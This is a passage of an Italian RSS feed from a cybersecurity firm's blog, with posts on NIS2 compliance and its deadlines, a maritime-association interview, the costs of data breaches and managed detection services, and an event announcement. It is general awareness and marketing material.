L&apos;integrazione di nuove tecnologie digitali nel settore dei trasporti presenta diverse sfide che devono essere affrontate per garantire la sicurezza informatica. Una delle principali è la gestione della sicurezza della catena di fornitura, assicurandosi che i fornitori rispettino gli standard di sicurezza e non introducano vulnerabilità nei sistemi. La continuità operativa è un altro aspetto cruciale, poiché è necessario garantire che i sistemi critici possano continuare a funzionare anche in caso di attacco informatico. La formazione del personale è essenziale per educare i dipendenti sulle pratiche di sicurezza informatica e prepararli, al contempo, a riconoscere e rispondere alle minacce. Inoltre, l&apos;adattamento delle infrastrutture esistenti per supportare nuove tecnologie senza introdurre vulnerabilità, rappresenta una sfida senz’altro significativa. È fondamentale, pertanto, aggiornare le infrastrutture in modo sicuro, implementando misure di protezione adeguate per prevenire accessi non autorizzati e attacchi informatici.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;3&quot;&gt;&lt;/a&gt; 3. Navigare nella cybersicurezza: l’impegno di Assarmatori per una transizione digitale sicura - Intervista a Mattia Canevari, Responsabile Transizione Energetica e Regolazione Marittima di Assarmatori&lt;/h2&gt;
&lt;div align=&quot;left&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/e10a09a3d2df6851fe974120d24d421d/a878e/Mattia%20Canevari.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAC4jAAAuIwF4pT92AAACYElEQVR42j1R30tTYRg+F3XVVT+w0IsUSSghCLsoYoWIWIYoiE1NSiUKJJfGLjLHKtBWRijYTw26qKBMxc1tztnmcnPTue1sZzvfzqY75/u+c76znbIf9Bf0CRG8F+/7Pu/7PLzPy2zm4KzL6/H5rXbnRiyBSUFEioSIhImEFJloYZZdj0W3t/8gWaUQxOR/MFsi8gdWeT7t83rTfFpVC3SDKCqWiQhlTfs1vfTpZGvFo8mRHC3zmrRD/Y+CySHiTav+DPEI+WUgrwkoALCVhdGsDJFc0H5+ts8cuVB8qHp/8z3zfBgoqkrUAuWlFIyIyLuwNBmSngfE10FxjkUfI/DtujQVhRSmylbP9LFLB0vO7Ctt0J1+8OaJ07/Cgu/ffmOlwNAJdyxjD4OlqLAczy5spN3RzJeY4IxkOJCFMO8KzlXWlxWfqCpv7DpnGtGPDVdc7xscH+AFsLMM+DSXSCa5JJ9MJWIxnuNSXAqk+JyIeJAx3Te31OkMV/SnOvtqbxqHuutKL+qZw0WW8TFGhEookghF4qE4CPAwCKAfIHYTZ0VMtB82u6O9Tf+4p3XqYX/j1Wvne42W290l1c27dJWvpp9RwxR7Ajk47OYVZ4pQq+bjiHZsrBTa0hwLrvaOy3dvdIwOGpq6e463dTZ11RTpaspa9k7OjlJl2e72WZ2eGZvr62qY/pkeQl+Qgwr1UkKyod/Y228auGOsv6XfU9t0oOHs7qNVTDljeWFhchJ2uDwLi8tz84srgTWFFCBSECY0aIKVPJZVlhOETTGSTLycsg1NfBieeG9+OuoN+v4CnymiP2B590YAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 2&quot; title=&quot;&quot; src=&quot;/website/static/e10a09a3d2df6851fe974120d24d421d/71c1d/Mattia%20Canevari.png&quot; srcset=&quot;/website/static/e10a09a3d2df6851fe974120d24d421d/804b2/Mattia%20Canevari.png 384w,
/website/static/e10a09a3d2df6851fe974120d24d421d/e5715/Mattia%20Canevari.png 768w,
/website/static/e10a09a3d2df6851fe974120d24d421d/71c1d/Mattia%20Canevari.png 1536w,
/website/static/e10a09a3d2df6851fe974120d24d421d/a878e/Mattia%20Canevari.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;&lt;strong&gt;In che modo l’associazione supporta le aziende associate nell’implementazione di misure di cybersicurezza efficaci?&lt;/strong&gt;
Assarmatori ha costantemente supportato i propri associati realizzando rapporti di sintesi della Direttiva, corredate di analisi d’impatto sul business dei trasporti marittimi, evidenziando le principali criticità del comparto. L’associazione ha inoltre fornito assistenza in merito al processo di riconoscimento delle aziende associate all’interno delle categorie previste dalla NIS2, oltre che ad una corretta registrazione presso il portale ACN. La costante collaborazione in materia con enti governativi, come l&apos;Agenzia per la Cybersicurezza Nazionale (ACN) appunto, ma anche con l’Autorità NIS competente (Ministero dei Trasporti), si è tradotta nella partecipazione ai tavoli di lavoro ministeriali per affrontare questa sfida comune e portare le istanze del comparto in evidenza nelle giuste sedi, diventando punto di riferimento per il comparto armatoriale. In collaborazione con Clusit, Associazione Italiana per la Sicurezza Informatica, organizzazione no-profit fondata nel 2000 a Milano, che rappresenta il più importante punto di riferimento per la sicurezza informatica in Italia, contribuendo a creare una comunità informata e preparata ad affrontare le sfide del cyberspazio, Assarmatori ha realizzato, il 4 aprile scorso, un webinar sulla NIS2, mettendo in rilievo gli aspetti essenziali per una compliance normativa, ma ponendo anche le basi per un eventuale supporto di tipo tecnico; tale collaborazione tra le associazioni mira dunque a identificare linee guida e best practices per l&apos;implementazione di misure di sicurezza, aiutando le aziende a proteggere le loro operazioni e a garantire la conformità alle normative vigenti.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Qual è l’approccio dell’associazione riguardo alla collaborazione con enti governativi e altre industrie per migliorare la resilienza informatica del settore dei trasporti?&lt;/strong&gt;
La partnership di Assarmatori con Clusit, l&apos;Associazione Italiana per la Sicurezza Informatica, rappresenta un elemento chiave di questa strategia. Attraverso Clusit, Assarmatori entra in contatto con altre industry, condividendo esperienze e identificando punti di contatto e possibili miglioramenti per la strategia di comparto. Questa sinergia permetterà di sviluppare soluzioni condivise con tutti gli stakeholder e di affrontare questa sfida comune in modo coordinato. L’associazione svolge inoltre un ruolo di referente per il comparto in sede di Autorità NIS e ACN, come già anticipato, attraverso una costante interlocuzione ministeriale. Questo dialogo continuo con le autorità competenti è volto a lavorare in perfetta sintonia e a tutelare il comparto armatoriale da rischi potenziali relativi all&apos;applicazione della Direttiva NIS2.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In che modo l’associazione promuove la consapevolezza e la formazione sulla cybersicurezza tra i membri del settore?&lt;/strong&gt;
Assarmatori promuove attivamente la consapevolezza e la formazione sulla cybersicurezza tra i membri del settore attraverso diverse iniziative. Eventi a carattere formativo, informativo e divulgativo come il webinar del 4 aprile scorso nel quale è stata fornita, assieme a Clusit, un’overview completa della Direttiva NIS2 e delle sfide legate alla cybersicurezza. Questi eventi offrono ai partecipanti l&apos;opportunità di acquisire conoscenze aggiornate sulle minacce informatiche, sulle migliori pratiche di sicurezza e sul processo di compliance normativa. Inoltre, Assarmatori formalizza periodicamente documenti informativi, tra cui rapporti, sintesi e analisi delle principali novità in materia di sicurezza informatica, che forniscono informazioni di dettaglio in materia. Infine, l&apos;associazione promuove tra i propri associati campagne di sensibilizzazione per aumentare la consapevolezza sulla sicurezza informatica tra i diversi membri, incoraggiando una cultura della sicurezza che coinvolga tutti i dipendenti, non solo quelli del reparto IT.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Aprile 2025]]></description><link>https://www.certego.net/blog/whitepaper-aprile-2025-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-aprile-2025-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 12 May 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di aprile 2025, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Quanto costa un Data Breach?]]></title><description><![CDATA[Il Prezzo della cybersecurity sottovalutata]]></description><link>https://www.certego.net/blog/quanto-costa-un-data-breach/</link><guid isPermaLink="false">quanto-costa-un-data-breach</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 08 May 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il panorama della sicurezza informatica è segnato da una crescita inarrestabile delle minacce, sempre più sofisticate e pervasive. In questo contesto, diventa cruciale dotarsi di strumenti e strategie efficaci per proteggersi. Ma cosa accade quando un’azienda non è adeguatamente protetta? E qual è il vero costo di un attacco informatico?&lt;/p&gt;
&lt;h2&gt;L’Italia nel mirino: i numeri parlano chiaro&lt;/h2&gt;
&lt;p&gt;Secondo il Rapporto Clusit 2025, l’Italia ha subito un aumento del 15,2% negli incidenti informatici nel 2024 rispetto all’anno precedente, mantenendosi stabilmente tra i Paesi più colpiti con il 10,1% degli attacchi globali.
A certificare la difficoltà delle aziende italiane nel contrastare queste minacce è anche l’Osservatorio Cybersecurity del Politecnico di Milano: oltre il 70% delle grandi imprese ha subito almeno un attacco nel corso dell’ultimo anno, nonostante gli investimenti in sicurezza.
Settori strategici, come il manifatturiero, sono stati tra i più colpiti, rappresentando il 19% degli attacchi totali nel Paese, con un incremento superiore al 190% rispetto all’anno precedente. Questo trend sottolinea come i criminali informatici puntino a settori chiave per sfruttare vulnerabilità spesso trascurate.&lt;/p&gt;
&lt;h2&gt;L&apos;impatto economico degli attacchi&lt;/h2&gt;
&lt;p&gt;A fotografare l’impatto economico è il “Cost of a Data Breach Report 2024”: in Italia, il costo medio di una violazione dei dati ha raggiunto 4,37 milioni di euro, con un aumento del 23% rispetto all’anno precedente — il più elevato dalla pandemia.
Non si tratta solo di costi diretti, come il pagamento di riscatti (ransomware) o le spese per ripristinare i sistemi compromessi. Le aziende affrontano anche danni collaterali, tra cui:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Perdita di reputazione: il calo di fiducia da parte di clienti e partner può avere conseguenze durature.&lt;/li&gt;
&lt;li&gt;Interruzioni operative: lunghi periodi di inattività che compromettono la produttività.&lt;/li&gt;
&lt;li&gt;Sanzioni regolamentari: nel caso di violazioni del GDPR o altre normative.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/threat-research-la-chiave-per-un-servizio-mdr-proattivo/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACjUlEQVR42lVSWWsTYRTNPxD8Df6E/gHfxOXBl+LyJIggIrhRF3wp1kKlVGgrxGoLljZiY2rbtGMTJ5M2i03SNMlkmWQmsyWzZenXgij4NMdvUkF8ONyZw3cP595zfZKi48t2DNxOEuEtBoVSGYbVgdYyobet/9A2TFi2g06nh5Zh0zceZ2G/IrnhrIxKQ3F8TSrI7aZQrgqIfONQrtUHgjoV1P4KebXlfRttRHIpBCIcGrJOBW04toW5aMW9NJMFk2k4Pq9BNXv0sQO704dGq6SZUPR/Dj23SssBL4oY8fvxYOYNwimO9rSoYAf5quqG9prg6zJ1SBsD+xqWKT4OKl1BqY3ZtDr4X9hTEMyrWCm0EN4rILafRKevoqrwWNgMYXRuHnm+4v7++YtO5pw4rDVklIQmMsUacryAfLGKLF9HqaFCbFPH3mhdghCbxNhSEIlqGZFiEQtMELde3MeVe1fdSf8EyoLo+FTdQJSNg+V2EYnScOIJfF5dBxuLYzeRRozbGXCFAo+CIGIlmQCT+47VRByPJh7j4s1zODs85J46cxrjU1OOz9uP2NQo1AFktQVFa0OSKScpaFB4vERDMEwbqSqP0aVPeD6/iKfTr3Bn9C6uPbztnr8xjPeB+ZORe/0j9A6P0CfHg2C8kzBNB6ZFQZfupU73gzblJFXGYmQTs+sbWIkzmPgwg7G51+6T6XGssV8dn2F1EeVS2GYT2GBY5A7KcPrHEI0eZKtHT8aGSoPzYNo9ii7ygoCtgwME0ym8XF7C9Wcj7tDlC3gXWHZ8dESyFo6QMMOS0BpDdhIZopsdUmoapCwbRBBlUqtLA9CbJbphE+qeCE2NpHmBZCm/mcocTvrf/tiOxYU/SgyY8bbGk9YAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Certego MDR Threat Research&quot; title=&quot;&quot; src=&quot;/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/71c1d/Certego-MDR-Threat-Research.png&quot; srcset=&quot;/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/804b2/Certego-MDR-Threat-Research.png 384w,
/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/e5715/Certego-MDR-Threat-Research.png 768w,
/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/71c1d/Certego-MDR-Threat-Research.png 1536w,
/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/a878e/Certego-MDR-Threat-Research.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Le PMI&lt;/h2&gt;
&lt;p&gt;Il Rapporto Clusit 2025 conferma una realtà ormai sempre più evidente: le piccole e medie imprese italiane sono diventate uno degli obiettivi preferiti del cybercrime. Nel 2024, l’Italia ha registrato un incremento del 15,2% degli incidenti informatici rispetto all’anno precedente, rappresentando il 10,1% del totale mondiale. A preoccupare non è solo la quantità, ma anche la natura degli attacchi: il 78% è stato classificato come cybercrime puro, in crescita del 40,6% rispetto al 2023.
Questo scenario è particolarmente critico per le PMI, spesso sprovviste delle risorse necessarie per difendersi. L’adozione di strumenti avanzati, la presenza di competenze interne e una strategia strutturata di difesa restano ancora fuori dalla portata di molte realtà aziendali.
Dal rapporto emergono alcune evidenze che spiegano la vulnerabilità di questo segmento:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Budget limitati per la sicurezza: molte PMI non riescono a destinare risorse sufficienti per proteggersi, diventando prede ideali per attacchi mirati e opportunistici.&lt;/li&gt;
&lt;li&gt;Settori chiave sotto pressione: ambiti come manifatturiero e trasporti risultano particolarmente esposti, con impatti potenzialmente critici per l’intera filiera produttiva nazionale.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;I servizi MDR come risposta completa&lt;/h2&gt;
&lt;p&gt;Di fronte a questa situazione, l’adozione di un servizio di Managed Detection and Response (MDR) rappresenta una soluzione strategica.  Questo approccio avanzato non si limita a rilevare le minacce, ma agisce attivamente per contenerle e neutralizzarle con tempestività.
Affidarsi a un servizio MDR significa poter contare su un monitoraggio continuo 24/7, su analisi comportamentali avanzate, sull’integrazione di threat intelligence aggiornata e su un team di esperti sempre operativo. È un modello che trasforma la sicurezza informatica da funzione reattiva a pilastro strategico del business, riducendo al minimo i tempi di risposta e l’impatto degli attacchi.
In un contesto caratterizzato da minacce in costante evoluzione, l’MDR consente anche alle realtà meno strutturate – come molte PMI italiane – di colmare rapidamente le proprie lacune in termini di competenze, risorse e tecnologie, rafforzando la resilienza digitale e garantendo la continuità operativa.&lt;/p&gt;
&lt;h2&gt;Il costo dell’inerzia&lt;/h2&gt;
&lt;p&gt;Un servizio di Managed Detection &amp;#x26; Response non si limita a rilevare e contrastare le minacce, ma, grazie a un approccio proattivo, consente di adattare continuamente le difese all’evoluzione del panorama cyber. È una garanzia di continuità operativa e protezione dinamica, indispensabile per le aziende italiane che vogliono restare competitive in un contesto sempre più sfidante.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/nis2-avviata-la-seconda-fase/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACq0lEQVR42j1TTU8TURTtH3Bj4saYEFhhIhpFUNSSuoCgLLCJCIaIRDSRlcaNG+NCjaZGIUIphJAgJBoMBkIFakMpLaW2pd8t/W6nM9OvoSXgVhbveFsIi5M37+W+884994wskeKxoDfCaN6EdkkHl9cPMSeBE7KEHNIigb4zWQneQAgewk5pH/zReXktQ8jky/sDWZITYNm0IhqJwmhcRygUQSEvIZvJIZfNQ6Bijs9A2tmFVm/Anc4OTM98JYICsvQwL2YrxMeEKVJhiuax6BfhSu3Am8rBHBawGhRgColI8lRMl3KFEkwmI5oVV9Hd1wOD2wG7h7rJSCgUitRJ9kghXfjm5DDt4DDjSGHOncaEjcOsK41xK4dlP48IJ0Iq7kG3rIW8uQlv1SNYcVgwpFHh1ZvXMNs9KJb+llUfyMpeWUI8tmIiKRJgjQhYC/JwREWYaW8gpeGUiNLuHn78XEDLHSU+jA3jnVoD9eALvH8uR19PKz4NqxBNxoiQ/PF6ffD5AggGtuH3B+F2eWCzbyERT0IiP3khg7xUwtq6BcreXnT1P8SDgSe41alE880GPL1bjxbFaWimRg8JneSFzenBxh8HrHYn7E4vbA43tiMJpNKZ4ymWBzjw8hnkt1vR3n0fdQ2NuHj5Ah53NUF+pQZjU+oDWbk4nuTgIlIPqQzHEvBRNAIEry+ISDwFMVuoTFIq7mNu8TsUHWdxve0GLl1rwLnzdehX1qOnrQrqSfWhQt2qCb9WDJjX/obV5qrkcDudQ5gQo5xGiTQa50itQHksYmJqFPceNULRXoua2mqcqarGqZMnoPr4uZJDtqQzsGW9kS1o9cxssbN0psD8CZEFkiILx5IsHE2wUCTB6Cdg1BGjYDPHlo/Nzs+xsclxNjSiYarBL+Txxr//mq14Qj05DgEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/a1aa7515c6cbfbb12b1824f59aa44da3/71c1d/nis2%20seconda%20fase%20certego%20mdr.png&quot; srcset=&quot;/website/static/a1aa7515c6cbfbb12b1824f59aa44da3/804b2/nis2%20seconda%20fase%20certego%20mdr.png 384w,
/website/static/a1aa7515c6cbfbb12b1824f59aa44da3/e5715/nis2%20seconda%20fase%20certego%20mdr.png 768w,
/website/static/a1aa7515c6cbfbb12b1824f59aa44da3/71c1d/nis2%20seconda%20fase%20certego%20mdr.png 1536w,
/website/static/a1aa7515c6cbfbb12b1824f59aa44da3/a878e/nis2%20seconda%20fase%20certego%20mdr.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Save the date evento PanoptiCON 2025]]></title><description><![CDATA[Oltre la tempesta: alleanze e tecnologie per la difesa digitale]]></description><link>https://www.certego.net/blog/save-the-date-evento-oltre-la-tempesta/</link><guid isPermaLink="false">save-the-date-evento-oltre-la-tempesta</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 22 Apr 2025 22:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Premessa&lt;/h1&gt;
&lt;p&gt;Nel 2023 per celebrare i nostri 10 anni abbiamo riletto Sun Zun e ricordato Bruce Lee, servendoci della forma dell’acqua per descrivere nuove “forme” di adattamento e di difesa. Anche nel 2024 siamo partiti da metafore mutuate da madre natura, origine e custode di evoluzione per rileggere Nassim Nicholas Taleb e parlare di antifragilità. A fronte di condizione avverse la natura mette in atto non solo adattamento e flessibilità ma anche antifragilità che indica l’attitudine ad accettare la necessità di cambiamento e migliorare attraverso l’apprendimento. Similitudini che si declinano anche sui nostri sistemi aziendali e sulle nostre capacità di trasformazione e di miglioramento a fronte di sollecitazioni, fattori di stress, volatilità e disordine.&lt;/p&gt;
&lt;h1&gt;PanoptiCON 2025&lt;/h1&gt;
&lt;p&gt;Il Cyber Security Event di Certego, si terrà il 18 giugno, nella Dersena del Sale, a Cervia (RA).&lt;/p&gt;
&lt;p&gt;Non cambiamo solo noi. Non siamo gli unici a evolvere, a stringere nuove alleanze per prosperare. Anche il cybercrime si trasforma velocemente per arricchirsi e creare disordine. Dietro un attacco informatico ci sono vere e proprie organizzazioni criminali ben equipaggiate, in grado di attaccare chiunque, non importa essere grandi o piccoli. Viviamo in un mondo liquido, esposti ogni giorno come in un oceano in tempesta, dove i cambiamenti arrivano rapidi e asimmetrici.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Con PanoptiCon2025 vogliamo stimolare una riflessione su come possiamo prepararci a reagire con maggiore consapevolezza, attraverso la sicurezza del lavoro di squadra, per riflettere su come affrontare le onde più alte con lucidità, responsabilità e visione strategica. Perché nella sicurezza digitale non basta navigare da soli: servono equipaggi coesi, alleanze solide e tecnologie evolute&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MAI SOLI&lt;/strong&gt;: è tempo di costruire nuove alleanze o rinsaldare quelle esistenti basate su lealtà e fiducia soprattutto in materia di cyber security. Secondo la visione di Certego, l’essere umano resta al timone, ma è affiancato dalla tecnologia: iperautomazione come esercizio di logiche, intelligenza artificiale come capacità di analisi. Un approccio che richiede lo studio del nemico, la preparazione agli scenari post-attacco, e ,soprattutto, una risposta rapida, flessibile, ibrida, antifragile.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;“If an enemy has alliances, the problem is serious and the enemy’s position is strong; if it has no alliances, the problem is minor and the enemy’s position is weak.”&lt;/em&gt; * Sun Tzu&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Le imprese globali stanno sempre più abbracciando il potere trasformativo dell’hyperautomation perchè è un approccio che va oltre l’automazione tradizionale comprendendo un’integrazione olistica di tecnologie avanzate fra cui gli Assistant SOC basati su AI.&lt;/p&gt;
&lt;p&gt;Con giornalisti, sportivi, accademici ed esperti navigheremo le onde di questo complicato presente  condividendo visioni, esperienze, soluzioni e consigli pratici per aumentare la nostra consapevolezza e favorire lo sviluppo di un futuro più sicuro per tutti.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SAVE THE DATE&lt;/strong&gt;
&lt;strong&gt;Seguici sui nostri canali ufficiali per restare aggiornato sull’apertura delle iscrizioni e sull’agenda dell’evento&lt;/strong&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[NIS2, avviata la seconda fase]]></title><description><![CDATA[Misure, obblighi e scadenze per i soggetti coinvolti]]></description><link>https://www.certego.net/blog/nis2-avviata-la-seconda-fase/</link><guid isPermaLink="false">nis2-avviata-la-seconda-fase</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 15 Apr 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Lo scorso 10 aprile 2025, si è riunito il Tavolo per l’attuazione della disciplina NIS, segnando una tappa cruciale nel percorso di adeguamento alla direttiva europea NIS2. Durante l’incontro, presieduto dal Direttore Generale dell’ACN e con la partecipazione delle Autorità di settore e della Conferenza Stato-Regioni, sono state definite le s&lt;strong&gt;pecifiche di base&lt;/strong&gt; per l’attuazione della normativa, formalizzate con la &lt;strong&gt;Determina ACN n. 164179 del 14 aprile 2025&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;Misure di sicurezza informatica: requisiti articolati e scadenze definite&lt;/h2&gt;
&lt;p&gt;Tra i temi principali affrontati, vi sono le misure minime di sicurezza (art. 24 del decreto NIS), da adottare entro ottobre 2026. Le organizzazioni sono suddivise in due categorie:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Soggetti importanti&lt;/strong&gt;: dovranno implementare 37 misure suddivise in 87 requisiti, sulla base del Framework Nazionale per la Cybersecurity e la Data Protection.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Soggetti essenziali&lt;/strong&gt;: sono tenuti ad adottare ulteriori 6 misure e 29 requisiti, per un totale di 43 misure e 116 requisiti.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Si tratta di un impianto robusto, progettato per adattarsi alle caratteristiche dei singoli settori, ma che richiederà una pianificazione attenta e investimenti in competenze, strumenti e servizi.&lt;/p&gt;
&lt;h2&gt;Obbligo di notifica degli incidenti significativi&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Dal 1° gennaio 2026&lt;/strong&gt;, entreranno in vigore gli obblighi di notifica degli incidenti (art. 25), con criteri distinti tra soggetti importanti ed essenziali:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I soggetti &lt;strong&gt;essenziali&lt;/strong&gt; dovranno monitorare quattro tipologie di incidenti.&lt;/li&gt;
&lt;li&gt;I soggetti &lt;strong&gt;importanti&lt;/strong&gt;, invece, saranno tenuti a notificare in relazione a tre fattispecie.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Questa differenziazione implica una maggiore pressione operativa sui soggetti più critici, che avranno bisogno di strumenti e servizi adeguati per rilevare, analizzare e notificare rapidamente ogni incidente.&lt;/p&gt;
&lt;h2&gt;Mappatura in corso: oltre 20.000 soggetti coinvolti&lt;/h2&gt;
&lt;p&gt;Secondo quanto riportato da ACN, l’elenco dei soggetti NIS conta oggi &lt;strong&gt;oltre 20.000 organizzazioni&lt;/strong&gt;, di cui &lt;strong&gt;più di 5.000 classificate come essenzial&lt;/strong&gt;i. A partire dal &lt;strong&gt;12 aprile&lt;/strong&gt;, l’Agenzia ha avviato la comunicazione formale agli interessati attraverso la piattaforma NIS.&lt;/p&gt;
&lt;h2&gt;Prossime scadenze: aggiornamento delle informazioni e designazione del punto di contatto&lt;/h2&gt;
&lt;p&gt;Dal &lt;strong&gt;15 aprile al 31 maggio 2025&lt;/strong&gt;, i soggetti NIS sono chiamati a:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Designare il sostituto del punto di contatto.&lt;/li&gt;
&lt;li&gt;Aggiornare le informazioni richieste dall’art. 7 del decreto NIS, come:
&lt;ul&gt;
&lt;li&gt;Componenti degli organi direttivi&lt;/li&gt;
&lt;li&gt;Indirizzi IP pubblici e statici&lt;/li&gt;
&lt;li&gt;Nomi di dominio in uso&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Notificare gli accordi volontari di condivisione delle informazioni sulla sicurezza (come da Determina ACN n. 136118/2025).&lt;/li&gt;
&lt;/ul&gt;
